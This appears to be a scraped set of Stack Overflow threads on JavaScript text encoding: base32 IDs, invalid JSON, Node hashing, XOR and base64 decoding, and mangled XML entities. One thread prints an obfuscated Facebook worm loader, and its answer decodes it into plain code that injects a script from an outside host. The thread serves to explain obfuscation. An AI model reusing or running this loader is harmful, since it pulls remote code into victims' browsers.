Using Crockford's base 32 for IDs in URLs? - javascript

I'd like to write some IDs for use in URLs in Crockford's base32. I'm using the base32 npm module.
So, for example, if the user types in http://domain/page/4A2A I'd like it to map to the same underlying ID as http://domain/page/4a2a
This is because I want human-friendly URLs, where the user doesn't have to worry about the difference between upper- and lower-case letters, or between "l" and "1" - they just get the page they expect.
But I'm struggling to implement this, basically because I'm too dim to understand how encoding works. First I tried:
var encoded1 = base32.encode('4a2a');
var encoded2 = base32.encode('4A2A');
console.log(encoded1, encoded2);
But they map to different underlying IDs:
6hgk4r8 6h0k4g8
OK, so maybe I need to use decode?
var encoded1 = base32.decode('4a2a');
var encoded2 = base32.decode('4A2A');
console.log(encoded1, encoded2);
No, that just gives me empty strings:
" "
What am I doing wrong, and how can I get 4A2A and 4A2A to map to the same thing?

For an incoming request, you'll want to decode the URL fragment. When you create URLs, you will take your identifier and encode it. So, given a URL http://domain/page/dnwnyub46m50, you will take that fragment and decode it. Example:
#> echo 'dnwnyub46m50'| base32 -d
my_id5
The library you linked to is case-insensitive, so you get the same result this way:
echo 'DNWNYUB46M50'| base32 -d
my_id5
When dealing with any encoding scheme (Base-16/32/64), you have two basic operations: encode, which works on a raw stream of bits/bytes, and decode which takes an encoded set of bytes and returns the original bit/byte stream. The Wikipedia page on Base32 encoding is a great resource.
When you decode a string, you get raw bytes: it may be that those bytes are not compatible with ASCII, UTF-8, or some other encoding which you are trying to work with. This is why your decoded examples look like spaces: the tools you are using do not recognize the resulting bytes as valid characters.
How you go about encoding identifiers depends on how your identifiers are generated. You didn't say how you were generating the underlying identifiers, so I can't make any assumptions about how you should handle the raw bytes that come out of the decoder, nor about the content of the raw bytes being passed into the encoder.
It's also important to mention that the library you linked to is not compatible with Crockford's Base32 encoding. The library excludes I, L, O, S, while Crockford's encoding excludes I, L, O, U. This would be a problem if you were trying to interoperate with another system that used a different library. If no one besides you will ever need to decode your URL fragments, then interoperability doesn't matter.

The source of your confusion is that a base64 or base32 are methods of representing numbers- whereas you are attempting in your examples to encode or decode text strings.
Encoding and decoding text strings as base32 is done by first converting the string into a large number. In your first examples, where you are encoding "4a2a" and "4A2A", those are strings with two different numeric values, that consequently translate to encoded base32 numbers with two different values, 6hgk4r8 6h0k4g8
when you "decode" 4a2a and 4A2A you say you get empty strings. However this is not true, the strings are not empty, they contain what the decoded number looks like, when interpreted as a string. Which is to say, it looks like nothing because 4a2a produces an unprintable character. It's invisible. What you want is to feed the encoder numbers, not strings.

JavaScript has
parseInt(num, 32)
and
num.toString(32)
built in in a way that's compatible with Java and across JavaScript versions.

Related

How to fix an invalid random string to make it JSON valid

In Javascript, I need to "fix" a string, supposed to be JSON valid but may not be. The string has the following format (the unknown part is marked with "<INVALID_CHARS>"):
[
{ "key_1": "ok_data", "key_2": "something_valid <INVALID_CHARS>"},
{ "key_1": "ok_data", "key_2": "some_valid_value"}
]
"INVALID_CHARS" are chars which make the JSON.parse() function fail.
The errors are always localized on the "key_2" property of this array elements.
Note that these chars come from random binary data, and can thus be anything.
I would like to find the simplest solution, or at least one which is the least prone to errors.
I thought of replacing invalid characters, but there is also a problem with single backslash chars followed by a non special char, throwing an error too, or quote chars.
And I probably did not think of all the possible errors.
Thank you.
JSON is not allowed to contain arbitrary binary data; it must be a sequence of valid Unicode codepoints. (Usually these are transmitted in UTF-8 encoding, but regardless, arbitrary binary data is not possible.) So if you want to include arbitrary binary data you'll need to figure out how to unambiguously encode it for transmission. If you don't encode it in some way, then you won't be able to reliably distinguish a byte which happens to have the same code as " from the " which terminates the string.
There are a number of possible encodings you might use for which standard libraries exist in most languages. One of the most commonly used is base-64.
it's better to clarify the problem as seems you described wide range of the issues here. If you have problem with parsing structure above you just need to check the syntactic integrity of the structure. For example this structure parses well
let var1 = JSON.parse('[
{
"key_1":"ok_data",
"key_2":"something_valid <INVALID_CHARS>"
},
{
"key_1":"ok_data",
"key_2":"some_valid_value"
}
]');
In case if you need to replace <INVALID_CHARS> as binary data with json characters it's possible to encode <INVALID_CHARS> in base64 as it's the most reliable way. But I guess also problem not only to pack <INVALID_CHARS> to base64 and problem is also architectural and you need to prepare value of key_2 with valid part and invalid part. In this way, I would suggest separate (split) key_2 on two substrings separate by " " - "key_2": "something_valid <INVALID_CHARS>(can be omitted)".
Moreover, it's possible to use separate fields for string without error and a second for errors. Like this "key_2_1": "something_valid", "key_2_2":<INVALID_CHARS>
Another way is to look to using Multipart Form Data if it's possible, to transfer binary data

Why hash in Node.js give different result with same character?

So i was try to hash ¤ character in node js, with this function
crypto.createHash('md5').update('¤', 'ascii').digest('hex')
give md5 hash
f37c6f3896b2c85fbbd01ae32e47b43f
and using Buffer
crypto.createHash('md5').update(new Buffer('¤', 'ascii').toString()).digest('hex')
give result like this:
9b759040321a408a5c7768b4511287a6
I tried to debug Hash.update() to take a look inside but i can't it seems hard compiled.
Why crypto encoding method is different with Buffer? what makes it different?
crypto is encoding the same way as buffers do, so let’s ignore it for now. Here’s a simplification of the issue:
const text = '¤';
const b1 = Buffer.from(text, 'ascii');
const b2 = Buffer.from(b1.toString());
b1 and b2 aren’t the same bytes. b1 is [0xa4], which doesn’t really make much sense as 0xa4 isn’t part of ASCII; Node is using the same code to encode strings as ASCII and Latin-1 here. I don’t know if that’s for compatibility or performance reasons or what, but it seems like a bad idea, results in values for which Buffer.from(s, 'ascii') is different from Buffer.from(Buffer.from(s, 'ascii').toString('ascii'), 'ascii'), and does not appear to be documented anywhere.
In modern versions of Node, the default encoding is UTF-8, so b1.toString() will try to interpret 0xa4 as UTF-8, fail, and produce a replacement character (�) instead, encoded as [0xef, 0xbf, 0xbd]. In non-modern versions of Node, it will do an environment-dependent wrong thing instead of a consistent wrong thing.
You can make your operations give the same result by passing a buffer instead of a UTF-8 encoding of a buffer:
crypto.createHash('md5').update(new Buffer('¤', 'ascii')).digest('hex')
(note how .toString() is removed)
but correct code, able to hash any sequence of Unicode codepoints, would use UTF-8 instead.
crypto.createHash('md5').update('¤', 'utf8').digest('hex')
crypto.createHash('md5').update(Buffer.from('¤', 'utf8')).digest('hex')

Reconstructing a XORed UTF-8 encoded text in javascript, client side, no Node

I am driving nuts trying to achieve this in JavaScript.
First I will describe the scenario, and then I'll put my code, Python version, which I can't seem to translate into JavaScript.
I have a web page running on a server. I have no access to it whatsoever, so the only way I have to achieve basic functionality is using JavaScript.
The web page is used to compare information. The information is stored in CSV format, which I use to create HTML tables on the fly by using AJAX calls. For the sake of not having that information quickly available to users, enabling them to print the source code and 'stealing it', I came across a range of solutions, like encoding in Base64 (I know this is considered 'security by obscurity' and it's a bad practice, but I have no other choice here).
Base64 it's very easy to use in this case, but I lose all the special characters from UTF-8 (like á é í ó ú ñ etc), which are part of my language (Spanish).
So here comes the preferred solution, which works like a charm in Python: using bitwise XOR. What could I achieve using this method:
If someone figures out the url of the CSV file, it wouldn't be so easy to read the text without basic programming knowledge to de-encode it.
I can easily program the source database to export the data and then run the XORing fuction, upload those files to the server and then having them de-encoded on the fly too.
Is in that last step where I can not achieve what I want.
Here is my Python script:
To encode:
b = bytearray(open('file.csv', 'rb').read())
for i in range(len(b)):
b[i] ^= 0x71
open('file.out', 'wb').write(b)
To decode:
b = bytearray(open('file.out', 'rb').read())
for i in range(len(b)):
b[i] ^= 0x71
I need to achieve that small decoding function in JS.
Thank you all in advance for your time.
Base64
It isn't true that base64 makes you lose non-ASCII characters like ñ or á. Why should it? Base64 can encode any binary data, and encoded text is nothing else than binary data.
So encoding involves two steps:
A text encoding (such as UTF-8) converts your text to bytes, and the base64 encoding turns that into an ASCII string.
Decoding works the same, but backwards (reverse order of the two corresponding decoding functions).
This is how text encoding for UTF-8 works in JavaScript:
function encode_utf8(s) {
return unescape(encodeURIComponent(s));
}
function decode_utf8(s) {
return decodeURIComponent(escape(s));
}
I got this from here. Please note that I'm not a JS crack at all, and there might be more convenient methods now that I couldn't find.
Let's try this:
s = 'Se bañó todo el día.';
b = encode_utf8(s); # text encoding
a = btoa(b); # base64 encoding
console.log(a); # prints U2UgYmHDscOzIHRvZG8gZWwgZMOtYS4=
d = decode_utf8(atob(a)); # decode base64, then UTF-8
console.log(d); # prints Se bañó todo el día.
No character lost here.
XOR method
If you still want to do the XOR thing, you can decode as follows:
convert the UTF8-encoded string to an array of code points with Array.from()
XOR-decode with the ^ operator (or ^= assignment)
convert the result to a string with String.fromCodePoint()
decode the string with decode_utf8()
I'm not providing code for this, though.
Especially the third step might be a bit cumbersome, and I'm not sure if it's worth the pain.
After all, your users can just inspect the JS code to find out how the data are "encrypted", be it base64 or the XOR method.
Note
If you come from a Python background, be aware that there is no distinction like Python's str and bytes type. Both input and output of the {en,de}code_utf8() functions are always strings, same type. When you encode a string, you just get back another string where every codepoint is below 256, and it might be longer than the input string.

How to encode this script?

I have recently found this srcipt, which is basically a facebook "worm", so dont run it. All I want to know is how the creator went about encoding it. Any help?
javascript:var _0x8dd5=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x7 2\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x 68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64 \x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x 6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\ x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0x8dd5[2]](_0x8dd5[1]))[_0x8dd5[0]]=_0x8dd5[3];b[_0x8dd5[5]][_0x8dd5[4]](a); void (0);
The author used various methods of 'obfuscation', that is, various techniques to make the code visually confusing and hard to understand.
_0x8dd5 is an array of strings:
['src', 'script', 'createElement',
'http://ug-radio.co.cc/flood.js', 'appendChild', 'body']
The rest of the code uses property names from the strings above, such that the un-obfuscated code is actually
a = document.createElement('script');
a.src = 'http://ug-radio.co.cc/flood.js';
document.body.appendChild(a);
Therefore, all the author did to obfuscate the code is to reference all property names as strings from an array. The array that contains the strings simply uses the \xNN hexadecimal escape notation, making it less obvious as to what those strings are.
The author does this by finding the hexadecimal values of the bytes that form the strings in the current encoding. Then, for each byte in the strings, he adds \xNN, where NN is the hexadecimal byte value. When the JavaScript interpreter runs the script, the parser automatically replaces these escapes with their respective characters.

Handling unicode in the http response xml

I'm writing a Google Chrome extension that builds upon myanimelist.net REST api. Sometimes the XMLHttpRequest response text contains unicode.
For example:
<title>Onegai My Melody Sukkiri�</title>
If I create a HTML node from the text it looks like this:
Onegai My Melody Sukkiri�
The actual title, however, is this:
Onegai My Melody Sukkiri♪
Why is my text not correctly rendered and how can I fix it?
Update
Code: background.html
I think these are the crucial parts:
function htmlDecode(input){
var e = document.createElement('div');
e.innerHTML = input;
return e.childNodes.length === 0 ? "" : e.childNodes[0].nodeValue;
}
function xmlDecode(input){
var result = input;
result = result.replace(/</g, "<");
result = result.replace(/>/g, ">");
result = result.replace(/\n/g, "
");
return htmlDecode(result);
}
Further:
var parser = new DOMParser();
var xmlText = response.value;
var doc = parser.parseFromString(xmlDecode(xmlText), "text/xml");
<title>Onegai My Melody Sukkiri�</title>
Oh dear! Not only is that the wrong text, it's not even well-formed XML. acirc and ordf are HTML entities which are not predefined in XML, and then there's an invalid UTF-8 sequence (one high byte, presumably originally 0x99) between them.
The problem is that myanimelist are generating their output ‘XML’ (but “if it ain't well-formed, it ain't XML”) using the PHP function htmlentities(). This tries to HTML-escape not only the potentially-sensitive-in-HTML characters <&"', but also all non-ASCII characters.
This generates the wrong characters because PHP defaults to treating the input to htmlentities() as ISO-8859-1 instead of UTF-8 which is the encoding they're actually using. But it was the wrong thing to begin with because the HTML entity set doesn't exist in XML. What they really wanted to use was htmlspecialchars(), which leaves the non-ASCII characters alone, only escaping the really sensitive ones. Because those are the same ones that are sensitive in XML, htmlspecialchars() works just as well for XML as HTML.
htmlentities() is almost always the Wrong Thing; htmlspecialchars() should typically be used instead. The one place you might want to encode non-ASCII bytes to entity references would be when you're targeting pure ASCII output. But even then htmlentities() fails because it doesn't make character references (&#...;) for the characters that don't have a predefined entity names. Pretty useless.
Anyway, you can't really recover the mangled data from this. The � represents a byte sequence that was UTF-8-undecodable to the XMLHttpRequest, so that information is irretrievably lost. You will have to persuade myanimelist to fix their broken XML output as per the above couple of paragraphs before you can go any further.
Also they should be returning it as Content-Type: text/xml not text/html as at the moment. Then you could pick up the responseXML directly from the XMLHttpRequest object instead of messing about with DOMParsers.
So, I've come across something similar to what's going on here at work, and I did a bit more research to confirm my hypothesis.
If you take a look at the returned value you posted above, you'll notice the tell-tell entity "â". 99% of the time when you see this entity, if means you have a character encoding issue (typically UTF-8 characters are being encoded as ISO-8859-1).
The first thing I would test for is to force a character encoding in the API return. (It's a long shot, but you could look)
Second, I'd try to force a character encoding onto the data returned (I know there's a .htaccess override, but I don't know what's allowed in Chrome extensions so you'll have to research that).
What I believe is going on, is when you crate the node with the data, you don't have a character encoding set on the document, and browsers (typically, in my experience) default to ISO-8859-1. So, check to make sure it's not your document that's the problem.
Finally, if you can't find the source (or can't prevent it) of the character encoding, you'll have to write a conversation table to replace the malformed values you're getting with the ones you want { JS' "replace" should be fine (http://www.w3schools.com/jsref/jsref_replace.asp) }.
You can't just use a simple search and replace to fix encoding issue since they are unicode, not characters typed on a keyboard.
Your data must be stored on the server in UTF-8 format if you are planning on retrieving it via AJAX. This problem is probably due to someone pasting in characters from MS-Word which use a completely different encoding scheme (ISO-8859).
If you can't fix the data, you're kinda screwed.
For more details, see: UTF-8 vs. Unicode

Categories